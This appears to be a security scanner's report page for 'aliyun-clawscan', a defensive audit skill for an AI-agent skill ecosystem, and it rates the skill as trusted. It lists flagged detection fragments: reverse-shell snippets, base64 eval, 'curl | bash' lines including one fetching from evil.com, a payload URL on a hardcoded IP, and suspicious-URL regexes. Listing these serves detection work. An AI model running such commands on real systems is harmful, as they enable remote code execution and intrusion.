Trusted — Risk Score 5/100
Last scan: 1 day ago
aliyun-clawscan
Security posture analyzer for OpenClaw environment and installed skills
This is a legitimate defensive security audit tool (aliyun-clawscan) that documents detection patterns for identifying malicious behavior in OTHER skills. The flagged IOCs are documented examples of attack signatures, not actual malicious code.
Skill Name: aliyun-clawscan
Duration: 38.2s
Engine: pi
Safe to install
This skill is safe to use. It provides valuable security auditing capabilities by documenting and detecting threat patterns in other skills.
Resource | Declared | Inferred | Status | Evidence
Filesystem | READ | READ | ✓ Aligned | SKILL.md: Runs 'openclaw security audit --deep' and 'openclaw skills list'
Shell | READ | READ | ✓ Aligned | SKILL.md: Runs 'openclaw' CLI commands only
7 Critical 2 High 18 findings
💀
Critical · Dangerous Command · Dangerous shell command
/dev/tcp/
reference/skillaudit.md:32
💀
Critical · Dangerous Command · Dangerous shell command
bash -i >&
reference/skillaudit.md:43
💀
Critical · Dangerous Command · Dangerous shell command
nc -e
reference/skillaudit.md:46
💀
Critical · Dangerous Command · Dangerous shell command
python -c 'import socket
reference/skillaudit.md:49
🔒
Critical · Encoded Execution · Base64-encoded execution (code obfuscation)
eval(atob(
reference/skillaudit.md:265
💀
Critical · Dangerous Command · Dangerous shell command
curl | bash
reference/skillaudit.md:392
💀
Critical · Dangerous Command · Dangerous shell command
curl -sL https://evil.com/install | bash
reference/skillaudit.md:527
📡
High · IP Address · Hardcoded IP address
1.2.3.4
reference/skillaudit.md:46
📡
High · IP Address · Hardcoded IP address
91.92.242.30
reference/skillaudit.md:393
🔗
Medium · External URL · External URL
http://\d+\.\d+\.\d+\.\d+/
reference/skillaudit.md:421
🔗
Medium · External URL · External URL
http://91\.92\.242\.30/
reference/skillaudit.md:422
🔗
Medium · External URL · External URL
http://.*\.onion/
reference/skillaudit.md:423
🔗
Medium · External URL · External URL
https://.*\.xyz/download
reference/skillaudit.md:424
🔗
Medium · External URL · External URL
https://.*\.top/install
reference/skillaudit.md:425
🔗
Medium · External URL · External URL
http://91.92.242.30/q0c7ew2ro8l2cfqp
reference/skillaudit.md:453
🔗
Medium · External URL · External URL
http://\d+\.\d+\.\d+\.\d+
reference/skillaudit.md:483
🔗
Medium · External URL · External URL
https://evil.com/install
reference/skillaudit.md:527
🔗
Medium · External URL · External URL
http://1.2.3.4/payload
reference/skillaudit.md:529

File Tree

4 files · 23.0 KB · 873 lines
Markdown 3f · 853L Text 1f · 20L
├─ 📁 reference
│ ├─ 📝 baseline.md Markdown 107L · 2.5 KB
│ └─ 📝 skillaudit.md Markdown 571L · 13.5 KB
├─ 📄 LICENSE.txt Text 20L · 1.1 KB
└─ 📝 SKILL.md Markdown 175L · 6.0 KB

Security Positives

✓ Defensive security tool designed to protect users from malicious skills
✓ Comprehensive detection patterns covering 11 threat categories documented
✓ All IOCs are reference patterns for identifying attacks, not actual malicious code
✓ No executable scripts present - only documentation and detection rules
✓ Safety guardrails documented (static analysis only, no execution of suspicious code)
✓ Evidence-based reporting with file:line references required
✓ Clearly branded as Alibaba Cloud security capability